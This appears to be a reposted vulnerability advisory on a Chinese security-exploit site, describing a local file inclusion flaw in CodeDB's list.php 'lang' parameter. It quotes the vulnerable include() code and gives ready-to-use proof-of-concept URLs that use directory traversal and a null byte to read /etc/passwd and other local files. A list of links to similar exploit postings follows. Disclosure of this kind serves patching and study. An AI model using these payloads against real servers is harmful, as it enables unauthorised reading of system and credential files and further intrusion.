CodeDB (list.php lang) Local File Inclusion Vulnerability

所属分类：网络安全 / Exploit 阅读数： 114

收藏 0赞 0分享

###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt\0
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd\0
http://[host]/[codeDB_path]/list.php?lang=../[local_file]\0

EoF.

更多精彩内容其他人还在看

CodeDB (list.php lang) Local File Inclusion Vulnerability

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

php Help Agent

Comdev Web Blogger

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Galatolo Web Manager 1.3a

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

网络赚钱

站长故事